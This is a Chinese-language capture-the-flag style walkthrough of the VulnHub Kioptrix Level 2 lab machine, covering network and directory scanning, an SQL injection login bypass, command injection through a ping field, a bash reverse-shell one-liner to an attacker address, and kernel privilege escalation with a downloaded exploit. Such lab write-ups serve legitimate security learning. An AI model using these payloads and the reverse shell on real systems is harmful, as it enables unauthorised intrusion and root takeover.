目录
知识点总结
1.总结目前所见的信息收集工具的使用
2.sql注入
3.Rce
4.提权
5.反弹shell探勘有权限的目录
6.内核提权的步骤
环境安装
c击机:kali2023
靶机:vulnhub Kioptrix Level 2
安装地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar
信息收集
之前也打过几个靶机,此处就把我目前看到过用过的信息收集工具,全部列举一遍
检索靶机IP收集
1.arp-scan
arp-scan -l
2.netdiscover
在这之前我们要检索我们kali攻击机所属子网,主要是利用靶机要和kali在同一个子网下
ifconfig
netdiscover -r 192.168.232.0/24
3.nmap
也要先查看kali所在网段
ifconfig
nmap -sP 192.168.232.0/24
端口扫描:
主要是使用nmap
nmap 192.168.232.130
//粗略扫描端口
nmap -A -p- 192.168.232.130
和
nmap -T4 -A -v 192.168.232.130
//单看输出结果第二个指令的输出更多更详细,但是论视觉来看,第一个指令更加清晰
这不仅可以扫出端口,还可以扫出相关端口的所用服务,大概估算,该IP的内核版本
//由于扫描的内容太多,此处就自列出有用的端口扫描部分
显然,第二个指令的输出内容更多更详细
此处推一篇更多nmap指令的博客:Nmap扫描常用命令:_nmap扫描命令大全-CSDN博客
网站目录文件扫描
1.dirb
dirb http://192.168.232.130
目录扫描,该扫描几乎遍历整个网站,不仅仅是单一目录扫描
dirb http://192.168.232.130 -X .php,.html,.zip,.txt,.git
该目录下对指定文件名进行扫描
上述指令针对小网站,目录较少的网站使用,如果网站目录文件过多,会由于输出的形式过于冗杂影响观察
2.gobuster
gobuster dir -u <url> -w <wordlist> -X <指定文件名>
示例
gobuster dir -u http://192.168.232.130 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
3.dirbuster(图形)
检索漏洞
访问80端口
查看源码
SQL注入利用
让我们以管理员登录,直接上万能账户
admin'#
rce利用
成功登录,ping指令,看能不能rce,此处用;分号来截断语句
我们输入命令,直接反弹shell
bash -i >& /dev/tcp/[ip]/[port] 0>&1
反弹shell之前,我们先监看kali端口1234
成功反弹
提权
查看操作系统
cat /etc/*-release
查看操作系统
uname -rms
查看内核版本
谷歌一下,Linux 2.6.9-55.EL i686 exploit,发现了9542.c
下载下来
放在网站目录/var/www/html
然后我们开始apach服务,并给9542.c赋予777权限
返回shell,并下载9542.c到网站目录下
但是权限不够,我们切到有权限的目录下 /tmp
此时成功了,我们赋予该文件777权限,并编译
第二种提权
searchsploit privilege | grep CentOS
不知道为什么明明CentOS版本不同,上述9545.c这个exploit也行,然后就是根据上述的方法执行就行了。
目前还没有找到其他通关方法!